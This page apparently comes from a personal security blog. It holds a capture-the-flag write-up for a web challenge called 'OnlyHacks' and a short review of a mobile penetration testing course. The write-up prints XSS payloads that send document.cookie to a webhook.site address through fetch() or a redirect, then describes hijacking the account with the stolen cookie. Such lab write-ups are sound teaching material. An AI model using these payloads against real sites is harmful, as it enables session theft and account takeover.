N31tP8H

Author: n31tp8h

  • Titanic

    Coming Soon!

  • OnlyHacks

    Summary

    This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.

    Write-up

    This image has an empty alt attribute; its file name is image.png

    The login page appears resistant to basic SQL injection and authentication bypass attempts.

    We will move on with the Sign Up function.

    This image has an empty alt attribute; its file name is image-1.png

    The signup process, however, requires a profile picture upload, which presents a potential vulnerability.

    Moving on the the Dashboard.

    This image has an empty alt attribute; its file name is image-2.png

    Upon reaching the dashboard, swiping through profiles reveals usernames, not nicknames, as indicated in dashboard.js. This suggests two possible attack vectors: XSS within the chat functionality or exploiting a web Large Language Model (LLM) integrated into the chatbot.

    This image has an empty alt attribute; its file name is image-3-1024x538.png
    This image has an empty alt attribute; its file name is image-4.png

    I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection. The challenge actually involves a simpler XSS vulnerability.

    Let try some basic XXS with:

    <script>alert(1)</script>

    This image has an empty alt attribute; its file name is image-5-1024x536.png

    We’ve confirmed the XSS vulnerability. Now, let’s craft a payload to steal cookies.

    <script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>

    Or

    <script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>

    This image has an empty alt attribute; its file name is image-6.png

    Replace the cookie we got and refresh the page to get the flag.

    This image has an empty alt attribute; its file name is image-7.png

  • Practical Mobile Pentest Associate (PMPA) Course Review

    Practical Mobile Pentest Associate (PMPA) Course Review

    Overview

    This course offers a fun and accessible introduction to basic Android and iOS penetration testing techniques, covering topics like static and dynamic analysis.

    At $249, it’s a worthwhile investment for a resume-enhancing certification. I hope that in the future, a more advanced course from TCM delving into deeper techniques would be a valuable addition.

    Exam

    The exam is an Android app, so pay close attention to the Android section of the course materials.

    Thoroughly review the rules of engagement and instructions before starting the exam, you’ll have ample time.

    If you’re new to web application penetration testing, familiarize yourself with the OWASP Top 10. Completing HTB OWASP Top 10 Track is highly recommended preparation.

    Tip

    • Take regular screenshots during the exam for your report.
    • The exam VM is web-based with a fixed resolution, which may sometimes prevent resizing your Android emulator. If this occurs, adjust your browser’s zoom and refresh the page until the emulator fits your screen.